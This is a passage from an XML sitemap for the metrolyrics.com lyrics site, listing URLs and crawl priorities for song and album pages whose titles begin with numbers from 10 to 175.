<loc>http://www.metrolyrics.com/10-days-out-blues-from-the-backroads-album-kenny-wayne-shepherd.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-from-6-album-bad-company.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-notes-on-a-summers-day-album-crass.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-seconds-to-go-lyrics-social-code.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-songs-album-the-melvins.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-things-i-hate-about-you-music-from-the-motion-picture-soundtrack-album-various-artists.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-years-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/10-years-today-lyrics-bullet-for-my-valentine.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-broken-windows-album-idlewild.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-colombian-album-fun-lovin-criminals.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-fun-album-matthew-sweet.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-ginuwine-album-ginuwine.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-live-album-prong.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-mai-no-kiss-lyrics-glay.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-million-lyrics-birdman.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-percent-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/100-round-the-bends-lyrics-missy-higgins.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100-yrs-lyrics-plies.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-degrees-lyrics-lil-wayne.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-fragen-lyrics-silbermond.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-kisses-album-patty-griffin.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-meere-lyrics-tokio-hotel.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-miles-away-lyrics-andre-andersen.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-miles-away-lyrics-hoodoo-gurus.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-miles-lyrics-blake-lewis.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-shards-lyrics-isis.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-ways-lyrics-zap-mama.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-words-lyrics-kumi-koda.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1000-years-away-lyrics-andi-deris.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10000-days-album-tool.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10000-hz-legend-album-air.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10000-maniacs-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/10000-years-lyrics-army-of-freshmen.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/100th-window-album-massive-attack.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/101-live-album-depeche-mode.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/101-lyrics-albert-hammond-jr.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1039-smoothed-out-slappy-hours-album-green-day.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1039smoothed-out-slappy-hou-album-green-day.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1039smoothed-out-slappy-hour-album-array.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/104210801072-104310881072-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/106310901086-105710761077108310721083-1071-what-ive-done-lyrics-linkin-park.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/107-degrees-lyrics-citizen-cope.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10cc-album-10-cc.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/11-januari-lyrics-gigi.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/11-silver-lyrics-ozzy-osbourne.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/111-ciento-once-album-tiziano-ferro.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1111-album-maria-taylor.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1111-album-regina-spektor.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/111770-album-elton-john.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/112-album-112.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/112-lyrics.html</loc> <priority>0.6</priority> </url> <url> <loc>http://www.metrolyrics.com/1140-mississippi-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/1182449289-album-chrisette-michele.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/11oz-album-guttermouth.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/11th-song-album-deep-blue-something.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-bar-acid-blues-lyrics-siobhan-donaghy.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-bar-blues-album-scott-weiland.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-gardens-live-album-billy-joel.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-golden-country-greats-album-ween.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-memories-album-travis.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-naked-lyrics-bitch-animal.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-play-album-r-kelly.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-songs-album-neil-diamond.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-step-programs-lyrics-eleventy-seven.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-stones-album-12-stones.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12-stones-lyrics.html</loc> <lastmod>2008-02-08</lastmod> <priority>0.8</priority> </url> <url> <loc>http://www.metrolyrics.com/12-victory-check-lyrics-tye-tribbett-ga.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/120-days-of-genitorture-album-genitorturers.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1200-curfews-album-indigo-girls.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/12203acoustic-album-maroon-5.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/123-lyrics-silbermond.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1234-lyrics-feist.html</loc> <priority>1</priority> </url> <url> <loc>http://www.metrolyrics.com/1259-lullaby-lyrics-bedouin-soundclash.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-above-the-night-album-my-life-with-the-thrill-kill-kult.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-album-blur.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-album-die-rzte.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-dias-lyrics-manu-chao.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-engines-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/13-ghosts-lyrics-balzac.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-lyrics-bigwig.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-stitches-album-nofx.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/13-ways-to-bleed-on-stage-album-cold.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1313-album-karemera.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/138-lyrics-a-dozen-furies.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-bis-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/14-lyrics-paula-cole.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-miles-lyrics-accidental-superhero.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-or-so-lyrics-as-friends-rust.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-shades-of-grey-album-staind.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-shots-to-the-dome-album-ll-cool-j.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14-super-exitos-album-la-mafia.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1459-album-sugar-ray.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/14th-stbreak-lyrics-beastie-boys.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/15-album-buckcherry.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/15-lyrics-rilo-kiley.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/15-minutes-past-the-diamond-lyrics-gucci-mane.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/15-year-killing-spree-album-cannibal-corpse.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1500-miles-lyrics-stephen-speaks.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16-biggest-hits-album-johnny-cash.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16-bit-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/16-days-lyrics-appleseed-cast.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16-fever-lyrics-gucci-mane.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16-hoes-lyrics-too-hort.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16-horsepower-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/16-stitch-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/169-album-nadiya.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/16volt-lyrics.html</loc> <priority>0.5</priority> </url> <url> <loc>http://www.metrolyrics.com/17-album-mxpx.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/17-years-lyrics-bad-astronaut.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/175-lyrics-big-d-and-the-kids-table.html</loc> <priority>0.4</priority> &..